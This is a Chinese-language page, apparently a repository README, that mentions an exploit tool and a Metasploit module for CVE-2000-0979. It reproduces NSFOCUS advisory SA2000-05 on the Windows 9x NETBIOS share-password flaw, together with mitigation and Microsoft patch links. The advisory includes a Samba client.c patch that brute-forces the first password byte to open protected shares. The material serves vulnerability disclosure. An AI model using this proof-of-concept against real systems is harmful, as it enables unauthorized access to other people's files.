CVE-2000-0979.rb 是针对 Windows 95 SMB 服务利用 CVE-2000-0979 的独立工具。
msf_2000_0979.rb 是 Metasploit 模块。你可以将其复制到 metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

更多文档即将推出!
NSFOCUS Security Advisory(SA2000-05)
主题: Microsoft Windows 9x NETBIOS 密码验证漏洞
发布日期: 2000 年 8 月 24 日 更新日期: 2000 年 10 月 11 日
Microsoft Windows 9x NETBIOS 协议实现所采用的密码验证机制中存在一个漏洞。该漏洞将允许任何用户在未知道共享密码的情况下访问受密码保护的 Windows 9x 文件共享服务。
你可以设置密码来保护 Microsoft Windows 9x 系统的共享资源。但在 Microsoft Windows 9x NETBIOS 协议实现所采用的密码验证机制中存在一个漏洞。验证密码时,密码的长度取决于客户端发送到服务器的数据长度。也就是说,如果客户端将密码长度设置为一个字节,并将包含明文密码的数据包发送给服务器,服务器只会将其与共享密码(明文)的第一个字节进行比较;如果一致,验证过程即告完成。攻击者只需猜测并尝试受害者的密码第一个字节即可。
Windows 9x 远程管理系统同样受到影响,因为它采用了相同的共享密码认证方法。
以下是一个演示此漏洞的简单示例。获取 samba 源代码包并如下修改 source/client/client.c:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
关闭 Microsoft 文件和打印机共享服务。
Microsoft 已知悉此问题,并针对此缺陷发布了一份安全公告。
该公告发布于:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
补丁可从以下位置获取:
. Microsoft Windows 95
补丁即将提供
. Microsoft Windows 98 和 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
本信息由 NSFOCUS 按“原样”提供,不附带任何形式的担保。除适销性担保外,NSFOCUS 不承担任何明示或暗示的担保。在任何情况下,NSFOCUS 均不对任何损害负责,包括直接、间接、偶然、后果性损害、商业利润损失或特殊损害,即使 NSFOCUS 已被告知此类损害的可能性。分发或复制本信息时,不得以任何方式修改本公告。
©版权所有 1999-2000 NSFOCUS。保留所有权利。使用条款。
NSFOCUS 安全团队 [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)